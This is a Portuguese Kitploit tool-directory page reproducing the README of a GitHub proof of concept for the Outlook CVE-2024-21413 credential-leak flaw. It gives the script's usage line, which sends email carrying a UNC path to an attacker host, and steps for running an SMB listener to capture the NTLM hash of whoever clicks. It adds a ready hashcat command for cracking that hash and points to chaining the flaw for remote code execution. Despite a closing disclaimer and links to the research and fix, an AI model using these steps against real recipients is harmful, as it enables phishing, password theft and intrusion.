Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-21413 — Vulnerabilidade de Divulgação de Informações do Microsoft Outlook (vazamento de hash de senha) - Expect Script POC | Kitploit
Ferramentas/GitHubGitHub/duy-31/cve-2024-21413
Quebra de SenhasFerramentas de PhishingAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoSegurança de Email
GitHubduy-31/cve-2024-21413

CVE-2024-21413

Vulnerabilidade de Divulgação de Informações do Microsoft Outlook (vazamento de hash de senha) - Expect Script POC

Ver Repositório
157335há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-21413 - Prova de Conceito do Script Expect

Vulnerabilidade de Vazamento de Credenciais e Execução Remota de Código do Microsoft Outlook quando encadeada com CVE-2023-21716 (através do painel de visualização) CVSS:3.1 9.8 / 8.5

O Outlook deveria alertá-lo sobre o risco de abrir um link externo => mas não é o caso!

image

uso: ./cve-2024-21413.sh mx.fqdn port sender recipient url

./cve-2024-21413.sh mail.mydomain.com 25 [email protected] [email protected] "\\xx.xx.xx.xx\test\duy31.txt"

notas: chmod +x cve-2024-21413.sh

requer o aplicativo expect & requer ip de remetente legítimo e email de remetente legítimo (para passar SPF, DKIM, DMARC)


  • Primeiro execute um ouvinte smb assim

image

  • execute o poc

image

  • e aguarde o email & na janela de visualização clique no link

image

  • então você deve recuperar o login & hash da pessoa que clicou no link (sem o prompt de aviso na versão afetada do Outlook)

    image

  • Você pode então tentar quebrar a senha com hashcat. Basta copiar toda a linha com o nome de login para um arquivo e executar o hashcat com o módulo 5600

hashcat -a 0 -m 5600 hash.txt rockyou.txt -o cracked.txt -O

  • Você pode encadear este CVE com CVE-2023-21716 para obter RCE !!!

Créditos: [https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/]

Solução Alternativa/Correção: [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413]


mais sobre mim ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ Aviso Legal: IMPORTANTE: Este script é fornecido APENAS para fins educacionais, testes éticos e uso legal. Não o utilize em qualquer sistema ou rede sem permissão explícita. O acesso não autorizado a sistemas e redes de computadores é ilegal, e os usuários pegos realizando atividades não autorizadas estão sujeitos a ações legais. O autor NÃO é responsável por qualquer dano causado pelo uso indevido deste script.

Baixar ferramenta